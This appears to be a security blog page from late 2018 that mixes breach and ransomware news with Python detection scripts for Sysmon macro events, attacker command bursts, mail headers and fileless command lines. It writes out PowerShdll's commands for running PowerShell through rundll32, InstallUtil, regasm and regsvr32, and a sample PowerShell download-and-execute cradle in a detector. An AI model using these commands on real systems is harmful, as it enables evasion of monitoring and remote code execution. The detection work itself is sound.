 

Cyber attack: KraussMaffei blackmailed by hackers

Heise News is reporting that KraussMaffei has been blackmailed by attackers using Emotet. From my personal background I know that some employees are still sitting at home waiting for their IT equipment to be rebuilt so they can start working again.

Sometimes the cost of a good cyber defence has to be measured against the cost of not having had one in place beforehand.

Translation of the original article from heise by Oliver Bünte:

The engineering group Krauss Maffei has been struck by a serious cyber attack. After the attack a good two weeks ago, the company headquartered in Munich was producing at some locations only with reduced capacity, as many computers were paralysed by a Trojan attack, a company spokesman confirmed on Thursday evening. In the meantime, his company is on the "way back to normal", and production is being ramped up. Important files were being made usable again. The vast majority of sites were not affected.

In addition, the previously unknown attackers are said to have demanded a ransom from the group. The spokesman did not want to say anything about the amount of the demand. Several security authorities were informed immediately after the attack on the night of November 21, according to the Frankfurter Allgemeine Zeitung (FAZ).

Trojan as the cause
According to the FAZ, the main location affected by the attack was the Munich site, where around 1,800 employees work for KraussMaffei and produce machinery for industry. An unspecified Trojan is said to have infected the network, encrypted computer files and thus rendered them useless. Whether this is a variant of the Trojan Emotet is still unclear. As a result of the attack, control systems in production and assembly could not be started. The systems were running again, however. The company did not provide information on the amount of damage.

On request of the FAZ, the Federal Office for Information Security (BSI) referred to two other current cases without mentioning the names of those affected. One of the two companies is likely to be the clinic in Fürstenfeldbruck, Bavaria, for which a variant of the currently rampant Trojan Emotet is believed to be the cause. According to a BSI spokesman, one hundred percent of the network's servers and computers failed during the attacks. In addition, several companies had shut down their production facilities themselves, resulting in production losses. It is unclear whether the same perpetrators are behind all cases.

The KraussMaffei Group with more than 5,000 employees claims to be one of the world's leading manufacturers of machinery and equipment for the production and processing of plastics and rubber. In 2016, the group was acquired by the Chinese chemicals group China National Chemical Corporation (ChemChina). The Chinese Securities and Exchange Commission has recently granted approval for a planned IPO, according to the company. The engineering company is not to be confused with the armaments company and tank builder Krauss-Maffei Wegmann (KMW). (with dpa material)

1st responder action for IR

Started some writing about what to do as 1st responder in an incident response case.

Stay tuned and join me on my article.

Free: IOC and YARA scanner Spark

Nextron is sharing (a limited version of) a multi-platform IOC and YARA scanner.

  • Free scanner for Windows, Linux and macOS
  • Precompiled and encrypted open source signature set
  • Update utility to download tested versions with signature updates
  • Documentation
  • Custom IOCs and signatures
  • Different output formats: text log, SYSLOG (udp/tcp/tcp+tls), JSON to file, JSON via Syslog
  • Scan throttling to limit the CPU usage

 

sysmon: Hunting for evil: detect macros being executed


Pieter Ceelen, technical security analyst at Outflank, is sharing his thoughts and techniques on using sysmon to detect the execution of macros for your SIEM.

Enhance your sysmon config with:

 

And get:
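The detection idea of the Outflank post, applied to Sysmon records, as an added example (my code, not the article's configuration or output). It combines two Sysmon events: Event ID 7 (ImageLoad) where an Office process loads the VBA runtime library VBE7.DLL, which means the VBA engine was used (a macro ran or the VBA editor was opened), and Event ID 1 (ProcessCreate) where an Office process spawns a shell or script host, which is where a malicious macro usually does its work. The event records are constructed, the GUIDs are placeholders, and the field names follow Sysmon's own event schema.

```python
"""Flag VBA macro execution in Sysmon telemetry (added example, constructed data)."""
from __future__ import annotations

from collections import defaultdict
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
VBA_RUNTIME = "vbe7.dll"   # VBA engine; only loaded when the VBA project/editor is used
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def image_name(path: str) -> str:
    """Case-insensitive file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def analyse(events: list[dict]) -> dict[str, list[str]]:
    """Map each Office ProcessGuid that used the VBA engine or spawned a script host to its findings."""
    findings: dict[str, list[str]] = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 7:  # ImageLoad
            proc = image_name(ev["Image"])
            if proc in OFFICE_APPS and image_name(ev["ImageLoaded"]) == VBA_RUNTIME:
                findings[ev["ProcessGuid"]].append(f"macro runtime loaded by {proc}")
        elif ev["EventID"] == 1:  # ProcessCreate
            parent, child = image_name(ev["ParentImage"]), image_name(ev["Image"])
            if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
                findings[ev["ParentProcessGuid"]].append(f"{parent} spawned {child}: {ev['CommandLine']}")
    return dict(findings)


def high_severity(findings: dict[str, list[str]]) -> list[str]:
    """ProcessGuids where the macro engine was loaded AND a script host was spawned."""
    return sorted(guid for guid, items in findings.items()
                  if any(i.startswith("macro runtime") for i in items)
                  and any(" spawned " in i for i in items))


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
VBA_DLL = r"C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL"

# Constructed sample telemetry: {A} runs a macro that starts PowerShell,
# {B} runs a macro that does nothing suspicious, {C} prints a document.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessGuid": "{A}", "Image": OFFICE + r"\WINWORD.EXE", "ImageLoaded": VBA_DLL},
    {"EventID": 1, "ParentProcessGuid": "{A}", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc <constructed-base64>"},
    {"EventID": 7, "ProcessGuid": "{B}", "Image": OFFICE + r"\EXCEL.EXE", "ImageLoaded": VBA_DLL},
    {"EventID": 7, "ProcessGuid": "{C}", "Image": OFFICE + r"\WINWORD.EXE",
     "ImageLoaded": r"C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL"},
    {"EventID": 1, "ParentProcessGuid": "{C}", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe"},
]

if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for guid, items in result.items():
        print(guid, "HIGH" if guid in high_severity(result) else "info", items)
```

The ImageLoad rule alone is noisy in shops where macros are part of daily work; the parent/child rule alone misses macros that only exfiltrate via Office's own network stack. Correlating both per ProcessGuid, as above, gives the SIEM a high-confidence alert and a lower-priority "macro seen" event for hunting.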

Someone Hacked 50,000 Printers to Promote PewDiePie YouTube Channel

One of those "you'd have never thought of this" stories:

To promote a YouTube channel, a guy used a common printer exploit kit to print his promotion.

Data breach: Marriott Hotel reservation system

327 million customer records have been (partly or completely) leaked from Marriott hotels since 2014. "Houston, we have a problem" :-)

30 November 2018

Marriott values our guests and understands the importance of protecting personal information. We have taken measures to investigate and address a data security incident involving the Starwood guest reservation database. The investigation has determined that there was unauthorized access to the database, which contained guest information relating to reservations at Starwood properties on or before September 10, 2018. This notice explains what happened, measures we have taken, and some steps you can take in response.

On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database. Marriott quickly engaged leading security experts to help determine what occurred. Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database.

Marriott has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property. For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information. Marriott reported this incident to law enforcement and continues to support their investigation. We have already begun notifying regulatory authorities.

Marriott deeply regrets this incident happened. From the start, we moved quickly to contain the incident and conduct a thorough investigation with the assistance of leading security experts. Marriott is working hard to ensure our guests have answers to questions about their personal information with a dedicated website and call center. We are supporting the efforts of law enforcement and working with leading security experts to improve. Marriott is also devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network.

Excellent: Windows Post Exploitation Article found

mubix@hak5.org did an excellent summary with a cool collection of short commands that saves you from searching.

I found a lot of cool stuff that can be used in other areas of cyber work as well.

Check the source at Google or see my page built with its data.

Good source to create a Usecase: Windows Commands Abused by Attackers

Shusei Tomonaga presents good figures on the Windows built-in commands most commonly used by attackers. Looking at the specific hit rates, this is a perfect entry point for creating use cases to detect bad guys on the machine.

Read the complete article here.


Initial Investigation

Ranking  Command            Times executed
1        tasklist           155
2        ver                95
3        ipconfig           76
4        systeminfo         40
5        net time           31
6        netstat            27
7        whoami             22
8        net start          16
9        qprocess           15
10       query              14

Reconnaissance

Ranking  Command            Times executed
1        dir                976
2        net view           236
3        ping               200
4        net use            194
5        type               120
6        net user           95
7        net localgroup     39
8        net group          20
9        net config         16
10       net share          11

Spread of Infection

Ranking  Command            Times executed
1        at                 103
2        reg                31
3        wmic               24
4        wusa               7
5        netsh advfirewall  4
6        sc                 4
7        rundll32           2
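One way to turn the three tables above into a SIEM use case, as an added example (my code, not from the article). Alerting on any single command is hopeless, because `dir`, `ping` and `type` are typed by every admin; what distinguishes an attacker's first minutes on a box is several distinct commands from the tables in quick succession. The detector below classifies each process command line against the table's command names and raises one alert per host when at least four distinct listed commands run within ten minutes. The input records are constructed, and their field names (`host`, `time`, `cmdline`) are an assumption.

```python
"""Detect bursts of attacker-favoured Windows commands (added example, constructed data)."""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# The three command groups from the tables above.
GROUPS = {
    "initial investigation": {"tasklist", "ver", "ipconfig", "systeminfo", "net time",
                              "netstat", "whoami", "net start", "qprocess", "query"},
    "reconnaissance": {"dir", "net view", "ping", "net use", "type", "net user",
                       "net localgroup", "net group", "net config", "net share"},
    "spread of infection": {"at", "reg", "wmic", "wusa", "netsh advfirewall", "sc", "rundll32"},
}


def classify(cmdline: str) -> tuple[str, str] | None:
    """Return (group, command) if the command line matches a table entry, else None.

    The first token is reduced to its bare name (quotes, path and .exe stripped).
    The two-word form is tried first so "net user" and "netsh advfirewall" match
    as a unit; otherwise the bare name ("reg", "sc", "whoami") is looked up.
    """
    tokens = cmdline.strip().lower().split()
    if not tokens:
        return None
    name = PureWindowsPath(tokens[0].strip('"')).name
    if name.endswith(".exe"):
        name = name[:-4]
    candidates = ([f"{name} {tokens[1]}"] if len(tokens) > 1 else []) + [name]
    for cand in candidates:
        for group, commands in GROUPS.items():
            if cand in commands:
                return group, cand
    return None


def detect_bursts(events: list[dict], window: timedelta = timedelta(minutes=10),
                  threshold: int = 4) -> list[dict]:
    """Alert per host when >= threshold distinct table commands run within `window`."""
    hits: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        match = classify(ev["cmdline"])
        if match:
            hits[ev["host"]].append((ev["time"], match[1]))
    alerts = []
    for host, seq in hits.items():
        for i, (start, _) in enumerate(seq):
            distinct = {cmd for t, cmd in seq[i:] if t - start <= window}
            if len(distinct) >= threshold:
                alerts.append({"host": host, "start": start, "commands": sorted(distinct)})
                break  # one alert per host is enough for the analyst
    return alerts


T0 = datetime(2018, 11, 26, 9, 0, 0)  # constructed timestamp
SAMPLE_EVENTS = [
    # WS01: five distinct table commands inside five minutes -> alert
    {"host": "WS01", "time": T0, "cmdline": r'"C:\Windows\System32\whoami.exe"'},
    {"host": "WS01", "time": T0 + timedelta(minutes=1), "cmdline": "systeminfo"},
    {"host": "WS01", "time": T0 + timedelta(minutes=2), "cmdline": r"C:\Windows\system32\net.exe user /domain"},
    {"host": "WS01", "time": T0 + timedelta(minutes=3), "cmdline": r"net view \\fileserver"},
    {"host": "WS01", "time": T0 + timedelta(minutes=4), "cmdline": "ipconfig /all"},
    {"host": "WS01", "time": T0 + timedelta(minutes=5), "cmdline": "notepad.exe notes.txt"},
    # WS02: ordinary admin activity spread over hours -> no alert
    {"host": "WS02", "time": T0, "cmdline": "ping 10.0.0.1"},
    {"host": "WS02", "time": T0 + timedelta(hours=1), "cmdline": r"dir C:\temp"},
    {"host": "WS02", "time": T0 + timedelta(hours=2), "cmdline": "ipconfig"},
    {"host": "WS02", "time": T0 + timedelta(hours=3), "cmdline": "tasklist"},
]

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_EVENTS):
        print(alert["host"], alert["start"].isoformat(), ", ".join(alert["commands"]))
```

Tune `threshold` and `window` against your own baseline: on jump hosts used by administrators the threshold has to be higher, while on end-user workstations even three distinct commands from the "initial investigation" group are rare enough to page on.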

p3nt4: Run PowerShell with dlls only

We all know that using PowerShell is an often-seen way of acting for the bad guys, but since sysmon it's even easy to detect.

Now the situation might slightly change, as powershell.exe is not needed any more.  :-/

But make up your own mind while reading this article by p3nt4.

Rundll32:

Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h              Display this message
rundll32 PowerShdll,main -f <path>       Run the script passed as argument
rundll32 PowerShdll,main -w              Start an interactive console in a new window (default)
rundll32 PowerShdll,main -i              Start an interactive console in this console
If you do not have an interactive console, use -n to avoid crashes on output

Alternatives (credit to SubTee for these techniques):

1.
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
2.
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShdll.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShdll.dll
3.
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShdll.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShdll.dll
4.
    regsvr32 /s /u PowerShdll.dll --> calls DllUnregisterServer
    regsvr32 /s PowerShdll.dll    --> calls DllRegisterServer

Amazon admits it exposed customer email addresses, but refuses to give details


by TechCrunch: Zack Whittaker, Josh Constine

Amazon emailed users Tuesday, warning them that it exposed an unknown number of customer email addresses after a “technical error” on its website.

When reached for comment, an Amazon spokesperson told TechCrunch that the issue exposed names as well as email addresses. “We have fixed the issue and informed customers who may have been impacted.” The company emailed all impacted users to be cautious.

In response to a request for specifics, a spokesperson said the company had “nothing to add beyond our statement.” The company denies there was a data breach of its website or any of its systems, and says it’s fixed the issue, but dismissed our request for more info including the cause, scale and circumstances of the error.

Amazon’s reticence here puts those impacted at greater risk. Users don’t know which of Amazon’s sites was impacted, who their email address could have been exposed to, or any ballpark figure of the number of victims. It’s also unclear whether it has or plans to contact any government regulatory bodies.

“We’re contacting you to let you know that our website inadvertently disclosed your email address due to a technical error,” said Amazon in the email with the subject line: “Important Information about your Amazon.com Account.” The only details Amazon provided were that: “The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.”

Continue the full story here.

 

Awesome Windows Domain Hardening

A curated list of awesome Security Hardening techniques for Windows.

Thanks to PaulSec. He provided the community with a cool selection of tools and howto's to harden your windows domain.

Created by gepeto42 and PaulWebSec but highly inspired by PyroTek3's research!

Summary

This document summarizes the information related to Pyrotek and Harmj0y's DerbyCon talk called "111 Attacking EvilCorp Anatomy of a Corporate Hack". Video and slides are available below.

It also incorporates hardening techniques necessary to prevent other attacks, including techniques discussed by gepeto42 and joeynoname during their THOTCON 0x7 talk.

On personal behalf: Me in the news...

One of my latest articles released at VDI:


Given today's threat landscape, an IT security strategy must monitor all infrastructure components and all network traffic around the clock. The article shows how the work of a Security Operation Center (SOC) supports IT staff in detecting cyber attacks early and in significantly reducing the risks posed by malware. According to the current BSI (Bundesamt für Sicherheit in der Informationstechnik, the Federal Office for Information Security) report on the state of IT security in Germany, around 380,000 new malware variants are sighted every day.

Continue here


 

Mail Header Analyzer: Parse the mailheader

Ever been tired of cutting and pasting email headers for forensic reports into Excel and Word?
Well, just use the MHA tool by Ahmed Shawky to ease that job.

Paste the raw header, compute, and you can cut and paste a neat table and picture directly into Word.
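What such a header analyser does under the hood, as an added example (my own standard-library code, not the MHA tool's). It unfolds the `Received:` chain, pulls the sending host, its IP, the receiving host and the timestamp out of each hop, orders the hops chronologically, computes the transit time between them, renders a plain-text hop table for the report, and flags the classic phishing tell of a `From:` domain that differs from the `Return-Path:` domain. The raw header is constructed (documentation IP ranges and `.test`/`.example` names).

```python
"""Parse a raw mail header into a forensic hop table (added example, constructed header)."""
from __future__ import annotations

import email
import re
from email.utils import parseaddr, parsedate_to_datetime

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
FROM_HOST = re.compile(r"\bfrom\s+(\S+)", re.I)
BY_HOST = re.compile(r"\bby\s+(\S+)", re.I)


def parse_received(value: str) -> dict:
    """One Received: header value -> {from, ip, by, time}; time is None if unparsable."""
    flat = " ".join(value.split())  # unfold continuation lines
    if ";" in flat:
        clause, _, date_part = flat.rpartition(";")  # the timestamp follows the last ';'
    else:
        clause, date_part = flat, ""
    frm, ip, by = FROM_HOST.search(clause), IPV4.search(clause), BY_HOST.search(clause)
    try:
        when = parsedate_to_datetime(date_part.strip()) if date_part.strip() else None
    except (TypeError, ValueError):
        when = None
    return {"from": frm.group(1) if frm else None, "ip": ip.group(1) if ip else None,
            "by": by.group(1) if by else None, "time": when}


def domain_of(addr_header: str | None) -> str | None:
    """Domain part of an address header such as From: or Return-Path:."""
    _, addr = parseaddr(addr_header or "")
    return addr.rpartition("@")[2].lower() or None


def analyse_header(raw: str) -> dict:
    """Hop list in chronological order plus the sender-domain consistency check."""
    msg = email.message_from_string(raw)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    hops.reverse()  # the top-most Received: line is the last hop
    transit = [int((b["time"] - a["time"]).total_seconds())
               for a, b in zip(hops, hops[1:]) if a["time"] and b["time"]]
    from_dom, rp_dom = domain_of(msg.get("From")), domain_of(msg.get("Return-Path"))
    return {"hops": hops, "transit_seconds": transit, "from_domain": from_dom,
            "return_path_domain": rp_dom, "subject": msg.get("Subject"),
            "sender_mismatch": bool(from_dom and rp_dom and from_dom != rp_dom)}


def hop_table(hops: list[dict]) -> str:
    """Plain-text hop table, one line per hop, ready to paste into a report."""
    rows = [f"{'#':<3}{'from':<28}{'ip':<17}{'by':<26}time"]
    for n, h in enumerate(hops, 1):
        t = h["time"].isoformat() if h["time"] else "?"
        rows.append(f"{n:<3}{h['from'] or '?':<28}{h['ip'] or '?':<17}{h['by'] or '?':<26}{t}")
    return "\n".join(rows)


# Constructed header: a lookalike "IT Support" mail relayed through one external host.
SAMPLE_HEADER = """\
Return-Path: <bounce@other-domain.test>
Received: from mail.example-relay.test (mail.example-relay.test [203.0.113.10])
    by mx.corp.example (Postfix) with ESMTPS id 4CONSTRUCTED
    for <alice@corp.example>; Mon, 26 Nov 2018 09:15:32 +0100
Received: from [198.51.100.23] (unknown [198.51.100.23])
    by mail.example-relay.test with ESMTP id constructed-hop-1;
    Mon, 26 Nov 2018 09:15:30 +0100
From: "IT Support" <support@corp.example>
To: alice@corp.example
Subject: Password reset required
Date: Mon, 26 Nov 2018 09:15:29 +0100
Message-ID: <constructed-001@other-domain.test>
"""

if __name__ == "__main__":
    report = analyse_header(SAMPLE_HEADER)
    print(hop_table(report["hops"]))
    print("transit seconds:", report["transit_seconds"])
    print("From/Return-Path mismatch:", report["sender_mismatch"])
```

Only the hop written by your own MX (the last one) is trustworthy; every earlier `Received:` line was supplied by the sender and can be forged, so treat the lower part of the table as a claim to be corroborated, not as evidence.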

FCL - Fileless Command Lines

Known command-lines of fileless malicious executions.

https://github.com/chenerlich/FCL/tree/master/Malwares

Motivation

While hashing malicious files to identify malicious executions is easy, blocking the execution of fileless malware is more challenging. This repository's purpose is to collect command lines being used by threat actors, to ease the difficulty of identifying them.

Structure

Each FCL file contains (or may contain) the following data:

  • Malware name
  • Executing process(es)
  • Malicious command-lines (contain dysfunctional URLs)
  • Fully\Partially deobfuscated command-lines
  • Regular Expression for detection
  • Technical write-ups
  • Sandbox report links
  • Notes
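The "regular expression for detection" and "partially deobfuscated command line" items above, worked through in code, as an added example (my code, not part of the FCL repository or of PowerShdll). It serves both the FCL section and the PowerShdll notes earlier on this page: the loaders listed there (rundll32, regsvr32, InstallUtil, regsvcs, regasm) are flagged when the module they are handed does not live in a trusted directory, and PowerShell launches are checked for a hidden window, for `-EncodedCommand` (whose argument is base64 of UTF-16LE text and is decoded before matching) and for download-cradle keywords. The trusted-directory list and the sample command lines are constructed assumptions.

```python
"""Match process command lines against fileless-execution patterns (added example)."""
from __future__ import annotations

import base64
import re
import shlex
from pathlib import PureWindowsPath

# Modules these loaders legitimately handle live under these trees (assumption);
# a relative path, a user profile or a temp directory is worth an alert.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WRITABLE_EXCEPTIONS = ("c:\\windows\\temp\\",)  # inside a trusted tree but world-writable
DOTNET_LOADERS = {"installutil", "regsvcs", "regasm"}
SCRIPT_PATTERNS = {
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line; non-POSIX mode keeps backslashes literal."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        tokens = cmdline.split()
    return [t.strip('"') for t in tokens]


def base_name(token: str) -> str:
    """Executable name without directory and without .exe, lower-cased."""
    name = PureWindowsPath(token).name.lower()
    return name[:-4] if name.endswith(".exe") else name


def in_trusted_dir(path: str) -> bool:
    p = path.lower()
    return p.startswith(TRUSTED_DIRS) and not p.startswith(WRITABLE_EXCEPTIONS)


def decode_encoded_command(b64: str) -> str | None:
    """PowerShell -EncodedCommand carries base64(UTF-16LE script); None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def scan_script_text(text: str) -> list[tuple[str, str]]:
    return [(name, m.group(0)) for name, pat in SCRIPT_PATTERNS.items() if (m := pat.search(text))]


def analyse_cmdline(cmdline: str) -> list[tuple[str, str]]:
    """Return (rule, detail) findings for one process command line."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return []
    exe, args = base_name(tokens[0]), tokens[1:]
    findings: list[tuple[str, str]] = []
    if exe == "rundll32" and args:
        dll = args[0].split(",")[0]  # rundll32 <dll>,<entrypoint> [args]
        if not in_trusted_dir(dll):
            findings.append(("rundll32_untrusted_dll", dll))
    elif exe == "regsvr32" or exe in DOTNET_LOADERS:
        for a in args:  # switches start with '/', the module being loaded does not
            if not a.startswith("/") and not in_trusted_dir(a):
                findings.append((f"{exe}_untrusted_module", a))
    elif exe in ("powershell", "pwsh"):
        for i, a in enumerate(args):
            low, nxt = a.lower(), (args[i + 1] if i + 1 < len(args) else "")
            # PowerShell accepts any unique prefix of a switch, so -e, -enc, -encodedcommand all count
            if (low.startswith("-e") and "encodedcommand".startswith(low[1:])) or low == "-ec":
                decoded = decode_encoded_command(nxt)
                findings.append(("powershell_encoded_command", decoded or nxt))
                if decoded:
                    findings.extend(scan_script_text(decoded))
            elif low.startswith("-w") and "windowstyle".startswith(low[1:]) and nxt.lower() == "hidden":
                findings.append(("powershell_hidden_window", f"{a} {nxt}"))
        findings.extend(scan_script_text(" ".join(args)))
    return findings


# Constructed samples: the PowerShdll invocations from this page, one encoded
# PowerShell cradle (built here, so the base64 is guaranteed valid) and two benign lines.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = {
    "powershdll_rundll32": "rundll32 PowerShdll,main -i",
    "powershdll_regsvr32": "regsvr32 /s /u PowerShdll.dll",
    "powershdll_installutil": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll",
    "encoded_powershell": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
    "benign_regsvr32": r"regsvr32 /s C:\Windows\System32\scrrun.dll",
    "benign_powershell": r'powershell.exe -NoProfile -File "C:\Program Files\Backup\nightly.ps1"',
}

if __name__ == "__main__":
    for label, line in SAMPLE_CMDLINES.items():
        print(label, "->", analyse_cmdline(line) or "clean")
```

Decoding before matching is what makes the script-level rules useful: a base64 blob matches nothing, while the decoded text trips both the download-cradle and the Invoke-Expression rule. Expect the loader rules to need a per-environment allow list (installers do run regasm and regsvr32 against freshly unpacked files).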

 

Interactive malware hunting service. Environments ready for live testing of most types of threats. Without installation. Without waiting.

 

Free to use for Win7 if privacy of the results is not an issue

 

Instagram accidentally exposed some user passwords through its data download tool

By accidentally providing some users with their cleartext passwords, Instagram proved to store passwords reversibly. This will be a hurray for future data leaks, I guess.

 

NIST: Guide to Malware Incident Prevention and Handling for Desktops and Laptops

A less technical but rather process-oriented view of handling a malware incident response.
This will become a "must read" for every incident responder.

WIRED: THE HAIL MARY PLAN TO RESTART A HACKED US ELECTRIC GRID

Wired has published another excellent article on a real-scenario test of some DARPA tools, following the recent hacker attacks on power grids.

In his years-long career developing software for power grids, Stan McHann had never before heard the ominous noise that rang out last Wednesday. Standing in the middle of a utility command center, he flinched as a cyberattack tripped the breakers in all seven of the grid's low voltage substations, plunging the system into darkness. "I heard all the substations trip off and it was just like bam bam bam bam bam bam bam bam," McHann says. "The power’s out. All you can do is say, OK, we have to start from scratch bringing the power back up. You just take a deep breath and dig in."

Thankfully, what McHann experienced wasn't the first-ever blackout caused by a cyberattack in the United States. Instead, it was part of a live, week-long federal research exercise in which more than 100 grid and cybersecurity experts worked to restore power to an isolated, custom-built test grid.

In doing so they faced not just blackout conditions and rough weather, but also a group of fellow researchers throwing a steady barrage of cyberattacks their way, hoping to stymie their progress just as a real enemy might.

Enjoy the whole article here.

US Cyber Command starts uploading foreign APT malware to VirusTotal

Follow the USCYBERCOM Malware Alert on Twitter to be informed of unclassified APT malware samples published at VirusTotal.

@CNMF_VirusAlert

This account is an alerting mechanism to highlight when #CNMF posts malware samples to Virus Total, enhancing our shared global cybersecurity.

FORT GEORGE G. MEADE, Md. — Today, the Cyber National Mission Force, a unit subordinate to U.S. Cyber Command, posted its first malware sample to the website VirusTotal. Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity. For members of the security community, CNMF-discovered malware samples will be logged at this website: 

Exploit Developer Discovers Zero-Day Microsoft Edge Vulnerability Triggering RCE Attacks

Zero-Day Microsoft Edge Vulnerability Induces RCE Attacks

As disclosed, exploit developer Yushi Liang has claimed to have found a vulnerability that breaks the Microsoft Edge browser. The newly discovered zero-day Microsoft Edge vulnerability could allow an attacker to remotely execute arbitrary code on the target system. Liang first revealed his discovery in a tweet.

No Patches Available Yet

For now, users of Microsoft Edge may not find a fix for the bug, since the researcher has not reported the flaw to Microsoft. Probably, as more details come up, Microsoft will release a patch for it. Until then, however, the only mitigation seems to be the choice of user account: while using Microsoft Edge, users should avoid logging in with administrator privileges to keep the damage minimal.
